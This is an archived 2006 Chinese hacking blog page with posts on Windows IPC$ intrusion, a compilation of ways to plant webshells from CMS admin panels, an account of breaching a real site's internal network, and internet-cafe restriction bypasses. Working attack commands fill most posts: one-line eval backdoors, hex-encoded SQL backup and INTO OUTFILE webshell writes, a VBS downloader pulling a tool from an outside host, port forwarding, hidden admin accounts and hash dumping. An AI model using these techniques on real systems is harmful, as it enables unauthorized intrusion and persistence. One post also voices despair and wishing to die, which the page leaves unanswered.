stone's blog
以一种忽视来证明自己的存在......
IT博客 | 首页 | 发新随笔 | 发新文章 | 联系 | 聚合 | 管理

经典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
  
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
  
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
  
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
  
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
  
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组  
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

posted @ 2006-10-14 02:45 stone 阅读(1306) | 评论 (4) | 编辑 收藏
 
破解工具大全--190个
     摘要: 以下含扩了从系统密码到应用软件、最高深的BIOS到最常见的ZIP、RAR压缩文件几乎所有的密码解读、解密工具(共计190条),以方便大家使用。 唯有一点请朋友们切记:不要将这些超级解密工具用于非法的或有损他人利益的情况!! ------------------------------------------------------------------------------ 1、 1-2-3 ...  阅读全文
posted @ 2006-10-13 15:35 stone 阅读(2638) | 评论 (3) | 编辑 收藏
 
从后台得到webshell技巧大汇总

前 言

  动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面。


注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。


一、直接上传获得webshell
这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。

二、添加修改上传类型
现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa|asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格!


三、利用后台管理功能写入webshell
上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。


四、利用后台管理向配置文件写webshell
利用"""":""//"等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker at 263 dot net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//",还有一种方法就是写上 cnhacker at 263 dot net"%><%eval request(chr(35))%><%',这样就会形成前后对应,最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时候要选前者。再如动易2005,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马"%><%execute request("l")%><%',保 存顶部栏目菜单参数设置成功后,我们就得到马地址http://网站/admin/rootclass_menu_config.asp。


五、利用后台数据库备份及恢复获得webshell
主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其他后缀 如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候,但是有asp系统在运行,利用此方法来查看源代码来获得其数据库的位置,为数据库插马来创造机会,动网论坛就有一个ip地址的数据库,在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法,很多asp程序在即使改了后缀名后也会提示文件非法,通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的,还有一种就是用记事本打开图片文件,随便粘贴一部分复制到asp木马文件头,修改gif后缀后上传也可以突破检测,然后备份为.asp文件,成功得到webshell。

六、利用数据库压缩功能
可以将数据的防下载失效从而使插入数据库的最小马成功运行,比较典型的就是loveyuki的L-BLOG,在友情添加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操作中压缩数据库,可以成功压缩出.asp文件,用海洋的最小马的eval客户端连就得到一个webshell。


七、asp+mssql系统
这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个本地提交的表单,代码如下:

<form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post">

<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>

<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>

<p><input type="submit" value="提交"></p> </form>

另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里,想要备份的WebShell的相对路径填写在“要复制到的位置”那里,提交就得到我们可爱的WebShell了,恢复代码和此类似,修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台,动网的数据库还原和备份是个摆设,不能执行sql命令备份webshell,只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell,一般后台是显示了绝对路径,只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码,利用动网7.0的注入漏洞可以用差异备份一个webshell,可以用利用上面提到的方法,将conn.asp文件备份成.txt文件而获得库名。

差异备份的主要代码:

;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--

;Drop table [heige];create table [dbo] dot [heige] ([cmd] [image])--

;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--

;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

这段代码中,0x626273是要备份的库名bbs的十六进制,可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也就是你要备份的webshell路径。当然也可以用比较常见备份方式来获得webshell,唯一的不足就是备份后的文件过大,如果备份数据库中有防下载的的数据表,或者有错误的asp代码,备份出来的webshell就不会成功运行,利用差异备份是成功率比较高的方法,并且极大的减少备份文件的大小。


八、php+mysql系统
后台需要有mysql数据查询功能,我们就可以利用它执行Select ... INTO OUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的webshell代码插入mysql在利用Select ... INTO OUTFILE语句导出shell。在mysql操作里输入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '路径’ 就可以获得了一个<?eval($_POST[a]);?>的最小马

'

0x3C3F6576616C28245F504F53545B615D293B3F3E 是我们<?eval($_POST[a]);?>的十六进制,这种方法对phpmyadmin比较普遍,先利用phpmyadmin的路径泄露漏洞,比较典型的 是http://url/phpmyadmin/libra9xiaoes/select_lang.lib.php。


就可以暴出路径,php环境中比较容易暴出绝对路径:)。提一点的是遇到是mysql在win系统下路径应该这样写d:\\wwwroot\\a.php。下面的方法是比较常用的一个导出webshell的方法,也可以写个vbs添加系统管理员的脚本导出到启动文件夹,系统重起后就会添加一个管理员帐号

Create TABLE a(cmd text NOT NULL)

Insert INTO a(cmd) VALUES('<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>')


select cmd from a into outfile '路径/b.php'

Drop TABLE IF EXISTS a

访问b.php就会生成一个<?eval($_POST[a]);?>的最小马。

如果遇到可以执行php命令就简单多了,典型的代表是BO-BLOG,在后台的php命令框输入以下代码:

<?

$sa = fopen("./up/saiy.php","w");

fw9xiaote($sa,"<?eval(\$_POST[a]);?".">");

fclose($sa);

?>


就会在up目录下生成文件名为saiy.php内容为<?eval($_POST[a]);?>的最小php木马,

最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?> 将会在当前目录生成一个a.php的最小马。

九、phpwind论坛从后台到webshell的三种方式


方式1 模板法

进入后台, 风格模版设置 ,在随便一行写代码,记住,这代码必须顶着左边行写,代码前面不可以有任何字符。

EOT;

eval($a);

p9xiaont <<<EOT

而后得到一个shell为http://网站/bbs/index.php。

方始2 脏话过滤法

进入安全管理 ◇ 不良词语过滤。新增不良词语写 a’]=’aa’;eval($_POST[’a’]);//

替换为那里可以随意写,而后得到一个shell地址为http://网站/bbs/data/bbscache/wordsfb.php。

方式3 用户等级管理

新建立会员组,头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a’;eval($_POST[’a’]);// ,升级点数依然可以随意写。而后得到一个shell地址为http://网站/bbs/data/bbscache/level.php。

以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。

十、也可以利用网站访问计数系统记录来获得webshell
最明显的就是某私服程序内的阿江计数程序,可以通过http://网站/stat.asp?style=text&referer= 代码内容&screenwidth=1024直接提交, 即可把代码内容直接插入到计数系统的数据库中,而此系统默认数据库为count#.asa,我们可以通过http://网站/count%23.asa访问得到webshell,由于阿江计数程序过滤了%和+,将最小马改成<SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request("1"))</SCRIPT>替换代码内容处提交,然后用lake2的eval客户端来提交,值得一提的是如果进到计数后台,可以清理某时某刻的数据,一旦插入asp木马失败,可以清理数据库再次操作。


解决方案


  由于本文涉及的代码版本很多,所以不可能提供一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补,若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补,可以到相关官方网站下载最新补丁进行修复更新。同时也请大家能时刻关注各大安全网络发布的最新公告,若自己发现相关漏洞也可及时通知官方网站。

posted @ 2006-10-12 20:07 stone 阅读(280) | 评论 (0) | 编辑 收藏
 
简单的破解网吧
其实网吧的破解非常简单!
第一:你如果可以找到QQ邮箱,FOXMAIL,OUTLOOK,的中的其中一个,自己给自己发封带附件的信,到网吧去收信,会自动下载到硬盘。
第二:利用IE的标记下载。如<img src="
http://www.127.com/1.exe ">这就可以下载1.exe程序到本地的IE缓存。
第三:利用网页的插件下载东西。这个以前经常用。但是很都被封了。(
http://ddd.dudu.com )这个是DUDU加速的插件下载地址。由于他是通过了验证的,所以系统并不屏蔽它。
第四:这个只针对逍遥游无盘系统的。打开IE里面的文件-->导入导出-->下一步-->下一步-->在里面输入G:\wincmd32\*.*在点旁边的浏览可以打开这个目录。这个目录里面是一个文件管理系统。可以通过他在G:\找到进程管理工具。把网管程序结束掉,就可以下载文件了。

posted @ 2006-10-12 17:42 stone 阅读(520) | 评论 (1) | 编辑 收藏
 
简单渗透内网

内网渗透对于大型网络入侵非常重要,但我们要懂得一些基本的网络结构,防火墙的设置,如果面的DMZ的配置情况,需要掌握端口转发、信息收集、社会工程学的利用、密码破解等,这是我今天上午拿下一网站内网服务器的经历,没什么技术含量,写出来和菜鸟朋友们分享一下。
  情况的起因:这几天没什么好玩的就去玩玩国外网站,国内的不敢玩了。。。。。。。。。。。
转去转来盯上一个中国台湾省的一个大站,有二十几个二级域名的分站点,这下好玩了。来点耐心,一个一个的分站去检测一下,一圈下来居然没收获,不是说站点越大入侵的机率越大嘛。于是再挑两个asp的站点看看,在一个不起眼的地方检测了一下搜索型注入,结果在搜索框里没过滤,便构造了一个注入点用nbsi跑起来。
不负众望,居然是一个sa权限的,接下来打算写一个webshell上去,才发现是数据库与web分离的,再看一下开放的端口,80、21、1433、3389都开开的,再看一下ip,是内网的,netstat -an看一下,所有的连接都是另一个内网ip,应该是其它服务器内网连接到这台数据库服务器上的,这只是一个小小的数据库服务器。
  再在本机的cmd下通过网站ip telnet一下上面的端口,不通,看来我是被困死在这台数据库服务器上面了,呆然开了3389是登不上的,相信很多人都遇到这种情况过。
于是我便在nbsi执行命令处下写了一段vbs下载脚本上去:
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"
http://www.ncph.net/lcx.exe ^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 >down.vbs
  接着执行cscript down.vbs 还好,下载lcx.exe成功,位置为c:\c.exe
  先来执行个端口转发看看,我知道他们的服务器都放在一个防火墙后面,但虽然外面不能访问里面,里面可以访问外面就好说了。
  继续在nbsi里面执行:c:\c.exe -slave xxx.xxx.xx.xx 51 172.26.1.248 3389
在我的另一台3389肉机监听:c:\lcx.exe -listen 51 4489 ,因为我上网是adsl拔号上网,ip会变的,所以我干脆转发到我的3389肉机上面,一是安全,二是速度快,三是可以让它一直转发到上面。因为我3389肉机的3389端口已开放,所以我就转到4489上面了,然后用3389登录127.0.0.1:4489。
  对了,还忘了建帐号,赶紧刷新nbsi建个隐藏帐号mghk$,这时c.exe 的进程并没有结束,所以转发仍没有断开,用建好的帐号直接进入.如图:

 进去的第一件事当然是隐藏帐号了,以前按照网上的做法总是在用户管理里面看得到mghk$这个用户,玩久了也就知道怎么做最好了,在导出两个注册表后,并不用net user mghk$ /del来删除,以前木木告诉我这样删除,后来我是直接在用户管理里面删除,再导入注册表,再net localgroup administrators mghk$ 加入管理组,这里候我们去用户表里和用户管理里面都看不到,除非管理员用net localgroup administrators才可以看到,不过这几个字母打下来手都痛了,所以没几个管理员这样查看的,以至于我的几台3389肉机用了大半年了还安然无恙,当然是高速极品肉机哦。
第二件事就向他的内网进军,我想到的是立即要做三件事,一是获得管理员密码,如果管理员在线,可以用findpass抓一下,因为这台是windows2000的,也可以用pwdump抓密码哈希再用lc5在本机破解。二是安装嗅探,用cain比较好,因为我们现在上的是3389,三是上传一个扫描软件,内网扫描它网段的内网ip,因为内网扫描我们就已绕过防火墙了,可以得到很多有用信息。
密码没用findpass到,用pwdump抓了个哈希下来用一台肉机开着lc5跑密码,装了个cain,可win2000需要重启,这里就不重启了,以免打草惊蛇。
我传了个hscan上去,自己构造了一下字典,然后扫描172.16.1.1-172.16.1.255网段。还传了个ms06040上去,准备内网溢出。扫描一会得到结果,有不少开139,445的,还空连接成功,更令人兴备的是扫出来一个1433弱口令,还是sa的,当然这些在外网是扫不出来的,因为防火墙屏蔽了所有的外网连接,就只有主站通过80端口连出来的。
如图看结果:

我再传了一个sql.exe上去,准备连接mssql用户名和密码为sa的ip,执行命令,还好,它还开了3389,当我们真正进入到内网进行操作的时候才发现比平时从外网入侵容易多了。
直接执行命令,如图:

进去后再次登上另一台的3389,这台上面已经有部分网站了,再次抓了这台机器的哈希,发现哈希一至,所以应该他们所有的服务器密码都是一至,只等我挂在肉机上的哈希密码跑出来就ok了,一般三天时间就跑出来,这样就可以宣布彻底搞定这个网站的所有服务器,大至登了一下,有八十几台服务器,台湾人真有钱。

posted @ 2006-10-12 04:17 stone 阅读(1482) | 评论 (0) | 编辑 收藏
 
-netsh命令详解
有朋友问我,“能不能在命令行下直接修改Windows2000的IP地址?”。
呵呵,当然是可以的了。不仅可以修改IP地址,和相关的每个细节都可以用命令行方式进行配置。
只不过一般大家不太习惯罢了。
方法就是使用系统中提供的一个很牛B的命令行工具“netsh”:
首先,察看自己现在的ip地址:
look:

呵呵,列出了两块网卡,其中接口名为“本地连接”的这块网卡配置情况:
使用了固定IP,其中ip地址为192.168.0.4,其他信息略(自己不会看啊)
好了,我们来修改这个IP
呵呵,改成什么呢,稍微改一点点吧:

呵呵,现在ip就是192.168.0.5了。
其实刚才改IP的时候并没有把命令写完整,完整的看这个:

呵呵,一堆命令吧,呵呵,现在的IP地址已经修改成10.0.0.13了。
呵呵
当然,命令行下修改IP也可以只用1条命令

到这里,netsh的最最最简单的功能,命令行下修改IP地址
已经说完了


看到一个朋友是做网管的,管理着公司几个不同的,每次都要抱着笔记本修改成不同的ip地址、不同的
子网掩码、、、其实,只要能够充分的发挥Netsh脚本的功能,就可以最快捷的修改自身的配置。
OK,开始
首先,显示一个配置脚本
look:

我们进入Netsh环境,切换到interface ip环境
通过dump命令将当前配置情况显示了出来。
第二步,导出一个配置脚本
look:

这样,我们就把刚才显示的配置脚本保存成了一个文件c:interface.txt
第三步,复制一个脚本拷贝interface2.txt并修改它
呵呵,原因?简单嘛,为了更方便的切换环境啊

注意哦,我们已经把所需要修改的ip地址、子网掩码、网关和dns做了修改。
最后,再把新的配置文件直接导入系统。

到这里,已经把配置部分修改了

总结:
通过Netsh里面的dump命令可以直接显示配置脚本。
而通过netsh -c interface ip dump >c:interface.txt的方式可以导出配置脚本。
然后再netsh -f c:interface.txt的方式又可以把导出的配置脚本再导回去。
一来一去间,就可以轻松的实现方便的修改配置。
Netsh里面还有很多很多命令,诸如可以进入netsh环境后,在根级目录用exec命令
也可以加载一个配置脚本。
另外还有对wins、路由、ras等服务的配置也可以通过Netsh的内置命令直接操作。
Windows的帮助里面都有相关的介绍。
posted @ 2006-10-11 20:36 stone 阅读(10932) | 评论 (2) | 编辑 收藏
 
迷惘.....
 寂静的午后,突然的感觉前所未有的迷惘 不清楚自己为什么存在,为什么活着,为什么呼吸,突然的突然感觉活着一点意义也没有,没有目标的活着就好似行尸走肉般的苟活着,毫无意义可言。难道就真的如人所说,活着就是更好一点的迎接死亡吗??不懂  好迷惘   每天荤荤噩噩的呼吸再睡去,有时真的好想就这样睡下去不醒来就好,也许死亡对于现在的我并不意味着是件坏事,想死。。却没有勇气去死,但转念间一想要真有决心去死的心  那小小的迷惘我怎么就没勇气去面对呢。国庆快过了。。朋友们也该散了 ,每人都有一个目标,我却连个影都看不到。难道就继续这样毫无目的的活着?我不想 这也不是 我所要的!但是对于未来的生活真的好迷惘,那感觉就似在一条漆黑的路上不断的奔跑却找不到一丁点的出口,也许我根本就没有未来,过去也不值一提,就这样的活着。 活着只是为了活着,只是为了简单的感受每天的第一道阳光,呼吸第一口的空气,让自己相信自己还活着,痛苦和迷惘的活着。。正如我现在的签名,我早已习惯每天45度的抬头看看窗外的世界,再90度角的感觉自己的迷惘和寂寞。。好想改变,却发现那难如登天。慢慢的我开始依赖上了烟,好喜欢抽烟时看着吐出来的烟雾 ,虚无的好象现在的我,飘渺的就象我的未来。消却后好象根本没有过一样,但手指以及房间里淡淡的味道却又告诉我它的存在。。虚虚幻幻的让我搞不清楚是不是我的错觉。。
   也许活着并不只是活着,既然已经活着了,那就肯定会有一个理由的。只是我还没有找到罢了。18岁的人生离未来还很是遥远,也许我也可以找到一个可以证明我为什么活的的理由的。也许在明天,也许在后天,也可能会更远。。但是到那时候我肯定将不再的迷惘不再的颓废。。但是。。。那天究竟我能不能等到??能不能找到??能不能快点到。。。。。。
   哀。。活着只是为了活着,地球还是在转,生活也还在继续,人们忙碌的脚步永远不会停下。。那我。。。究竟为什么这样的迷惘..............................

posted @ 2006-10-11 04:57 stone 阅读(217) | 评论 (0) | 编辑 收藏
 
Sun Java System Content Delivery Server信息泄露漏洞
受影响系统:
Sun Java System Content Delivery Server 5.0
Sun Java System Content Delivery Server 4.1
Sun Java System Content Delivery Server 4.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19705

Sun Java System Content Delivery Server可为移动用户提供可以下载的数据服务。

Sun Java System Content Delivery Server的实现上存在漏洞,本地或远程非特权用户可能利用此漏洞读取系统上任意文件的数据。

<*来源:Sun Alert Notification

链接:
http://secunia.com/advisories/21628/
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102593-1
*>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Sun
---
Sun已经为此发布了一个安全公告(Sun-Alert-102593)以及相应补丁:
Sun-Alert-102593:Security Vulnerability in the Sun Java System Content Delivery Server May Allow Unauthorized Data Access
链接:
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102593-1


posted @ 2006-10-10 06:34 stone 阅读(252) | 评论 (0) | 编辑 收藏
 
GetWebShell

 
可称为注入一类的经典工具!

    点击下载

posted @ 2006-10-10 04:34 stone 阅读(816) | 评论 (0) | 编辑 收藏
 
中国红客内部后台入侵程序
我们联盟人写的.. 很不错的!!                              
点击下载
posted @ 2006-10-10 04:22 stone 阅读(1207) | 评论 (2) | 编辑 收藏
 
仅列出标题
共4页: 1 2 3 4 
随笔:32 文章:7 评论:29 引用:0
<2006年10月>
日一二三四五六
24252627282930
1234567
891011121314
15161718192021
22232425262728
2930311234

公告

当发现不再是我心中最美丽 当心情慢慢的趋于平静 当希望自己会有更多的快乐... 才发 现这一刻来得并不容易... 或许我不能把未来的路看的很清楚 只想选择属于自己快乐的路... 或许我不能把爱看的很清楚 只想把快乐牢牢的握在手中... 如果未来的路 会有很多快乐... 快乐需要去争取 也需要珍惜...
QQ

常用链接

  • 我的随笔
  • 我的评论
  • 我参与的随笔

留言簿(6)

  • 给我留言
  • 查看公开留言
  • 查看私人留言

随笔分类(32)

  • 入侵检测(5) (rss)
  • 学习笔记(17) (rss)
  • 生活笔记(3) (rss)
  • 黑软交流(7) (rss)

文章档案(7)

  • 2006年10月 (7)

相册

  • 工具
  • 彼暗...

收藏夹(5)

  • 一些看了有感触的东西(2) (rss)
  • 技术档案(3) (rss)

友情叶子

  • Sumer's bolg
  • 问心'bolg

在线服务

  • Alexa排名查询
  • IP查询
  • 中国站长同盟
  • 卡巴免费查毒
  • 在线MD5破解
  • 在线查文件类型
  • 在线端口扫描
  • 在线网页编辑器
  • 在线翻译
  • 文档在线编辑器
  • 系统安全测试
  • 网页版photoshop

学习基地

  • 黑客派对
  • E.S.T
  • Script.Security.Team
  • 中国红客
  • 波波下载
  • 黑客X档案
  • 黑客基地
  • 黑客小组
  • 黑客手册

最新随笔

  • 1. CISCO协议总结大全
  • 2. SQL Server SA权限总结经典技术
  • 3. SA权限仅需xp_regwrite即可有dos shell (转)
  • 4. 欺骗?.快乐...?
  • 5. 木马专杀
  • 6. 各类技术认证
  • 7. 简单的命令控制同一局域网内的电脑
  • 8. DOS下一些很有用的命令
  • 9. 一些有用的ASP注入相关的命令
  • 10. 一个网马源码,把其中木马地址填成你自己的就可以了.

搜索

  •  

最新随笔

  • 1. CISCO协议总结大全
  • 2. SQL Server SA权限总结经典技术
  • 3. SA权限仅需xp_regwrite即可有dos shell (转)
  • 4. 欺骗?.快乐...?
  • 5. 木马专杀
  • 6. 各类技术认证
  • 7. 简单的命令控制同一局域网内的电脑
  • 8. DOS下一些很有用的命令
  • 9. 一些有用的ASP注入相关的命令
  • 10. 一个网马源码,把其中木马地址填成你自己的就可以了.

最新评论

  • 1. re: -netsh命令详解
  • 评论内容较长,点击标题查看
  • --TTT
  • 2. re: 破解工具大全--190个
  • xie xie
  • --1
  • 3. re: NBSI2破解版
  • 不能下载!!!
  • --寻欢
  • 4. re: 冰舞V2.5
  • 下载后有病毒!!
  • --寻欢
  • 5. re: 明小子的php注入工具
  • 这款太容易用了
  • --123

阅读排行榜

  • 1. -netsh命令详解(10932)
  • 2. 简单的命令控制同一局域网内的电脑(5090)
  • 3. 明小子的php注入工具(3954)
  • 4. 破解工具大全--190个(2638)
  • 5. NBSI2破解版(1961)

评论排行榜

  • 1. 经典入侵模式(4)
  • 2. 破解工具大全--190个(3)
  • 3. 明小子的php注入工具(3)
  • 4. 中国红客内部后台入侵程序(2)
  • 5. -netsh命令详解(2)

Powered by: 博客园
模板提供:沪江博客
Copyright ©2025 stone